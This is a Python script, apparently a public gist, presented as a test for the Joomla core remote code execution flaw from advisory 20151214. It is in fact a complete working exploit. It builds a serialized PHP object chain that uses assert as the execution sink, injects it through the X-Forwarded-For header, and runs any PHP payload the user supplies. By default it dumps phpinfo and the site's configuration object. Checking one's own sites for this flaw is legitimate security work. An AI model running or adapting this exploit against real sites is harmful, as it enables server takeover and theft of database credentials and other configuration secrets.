Joomla test for 20151201 Remote Code Execution Vulnerability
#!/usr/bin/env python
##
# This script tests a given website for the Joomla core Remote Code Execution vulnerability described in security advisory 20151214 ( https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html ). Only run it against sites you are authorised to test: the default payload prints the target's configuration object, so treat the saved response as sensitive.
#
# Instructions:
# - Download this gist: wget https://gist.githubusercontent.com/stevenrombauts/553584e7ab2ef4a832f2/raw/a140c7f5c1bcdc44e71dbfb07da76e418379ba8e/exploit-joomla.py
# - Make executable: chmod +x exploit-joomla.py
# - Run: ./exploit-joomla.py http://yoursite.com/
##
import md5  # unused; Python 2 only
import os
import sys
import tempfile
import uuid

import requests
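def main(argv):
    """Run the RCE check against argv[1], optionally with a PHP payload in argv[2].

    Prints the verdict and the path of the saved response body. The payload is
    suffixed with ``echo '<uuid>';`` and the target only counts as vulnerable
    if that marker comes back in the response; a payload that does not end in
    ``;`` gets one added, because PHP would otherwise reject the whole statement
    and the scan would report a false negative.

    The response body is written to a fresh temporary file that is readable
    only by the current user (tempfile.mkstemp creates it 0600) instead of a
    fixed path under /tmp: the default payload dumps the target's
    configuration object, and a predictable path is both a symlink-planting
    target and readable by other local users.

    Calls usage() (which exits) when no URL is given, and exits with status 1
    when the HTTP requests fail - a failed request is not evidence either way.
    """
    if len(argv) < 2:
        usage()  # does not return
    target = argv[1]
    payload = argv[2] if len(argv) > 2 else "phpinfo(); print_r(JFactory::getConfig());"
    print("Testing {0} with payload \"{1}\" ..".format(target, payload))

    # Random marker so static page content cannot produce a false positive.
    identifier = str(uuid.uuid4())
    if not payload.rstrip().endswith(";"):
        payload += ";"
    payload += "echo '{0}';".format(identifier)
    pl = generate_payload(payload)

    try:
        response = exploit(target, pl)
    except requests.exceptions.RequestException as exc:
        sys.stderr.write("Request to {0} failed: {1}\n".format(target, exc))
        sys.exit(1)

    # mkstemp: unpredictable name, O_EXCL creation, owner-only permissions.
    fd, result_path = tempfile.mkstemp(prefix="joomla-rce-", suffix=".html")
    with os.fdopen(fd, "wb") as text_file:
        text_file.write(response.text.encode("utf-8"))
    print("Response stored in {0}".format(result_path))

    if identifier in response.text:
        print("{0} is \033[91mvulnerable\033[0m: PHP payload was injected and executed!".format(target))
    else:
        # Absence of the marker only shows this particular payload did not run:
        # a WAF, a non-Joomla target or a different session backend give the
        # same result, so do not over-read "safe".
        print("{0} is \033[92msafe\033[0m from code injection (marker not returned; this is not proof the site is patched).".format(target))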
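def usage():
    """Print the command-line usage to stderr and exit with status 2.

    Exits non-zero (2 is the customary code for a command-line usage error) so
    that a wrapper script cannot mistake a missing argument for a successful
    scan; the message goes to stderr so it does not pollute captured output.
    """
    sys.stderr.write("Usage: ./script <URL to scan> [PHP payload]\n")
    sys.exit(2)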
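def exploit(url, user_agent, timeout=30):
    """Send *user_agent* to *url* in the X-Forwarded-For header and return the second response.

    Despite its name (kept for backward compatibility), *user_agent* is sent as
    the ``X-Forwarded-For`` header, not as ``User-Agent``. Two GETs are made:
    the first with the header alone, the second with the same header plus the
    cookies the first response set - presumably so the value stored
    server-side on the first request is processed again on the second
    (TODO confirm against the advisory). *timeout* (seconds) bounds each
    request so a non-responding host cannot hang the scan; TLS certificate
    verification is left at the requests default (enabled).

    Raises requests.exceptions.RequestException on connection errors or timeouts.
    """
    headers = {"X-Forwarded-For": user_agent}
    first = requests.get(url, headers=headers, timeout=timeout)
    return requests.get(url, headers=headers, cookies=first.cookies, timeout=timeout)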
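def php_to_chr(data):
    """Return *data* as a PHP expression of dotted ``chr()`` calls.

    ``"ab"`` becomes ``"chr(97).chr(98)"``; an empty input yields ``""``.
    Text is encoded to UTF-8 first so every emitted value is a single byte
    (0-255), which is what PHP's chr() takes; iterating a Python 3 str
    directly would emit code points above 255 for non-ASCII characters.
    Byte strings (Python 2 str included) are used as-is.
    """
    raw = data if isinstance(data, bytes) else data.encode("utf-8")
    # bytearray iteration yields ints on both Python 2 and 3.
    return ".".join("chr({0})".format(b) for b in bytearray(raw))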
def generate_payload(php_payload):
    """Embed *php_payload* in the serialized PHP object string used for the test.

    The PHP code is first rewritten as ``eval(chr(..).chr(..)...)`` (see
    php_to_chr) so it contains no quotes or other characters that could break
    the serialized string, then placed as the ``feed_url`` value of the object
    graph; the ``s:<len>:"..."`` length prefix must equal the embedded string's
    length exactly. NOTE(review): ``cache_name_function`` is set to ``assert``,
    which appears to be the code-execution sink (PHP assert() on a string
    evaluates it) - confirm against the linked advisory. The four trailing
    bytes are not valid UTF-8 and are reproduced byte-for-byte on purpose;
    presumably they make the target's storage truncate the stored value at
    that point - do not "fix" them.
    """
    code = "eval({0})".format(php_to_chr(php_payload))
    feed_url = "{0};JFactory::getConfig();exit".format(code)
    parts = [
        r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''',
        r'''s:{0}:"{1}"'''.format(len(feed_url), feed_url),
        r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''',
        "\xf0\xfd\xfd\xfd",
    ]
    return "".join(parts)
if __name__ == "__main__":
    # Script entry point: hand the raw argv (argv[0] included) to main().
    main(sys.argv)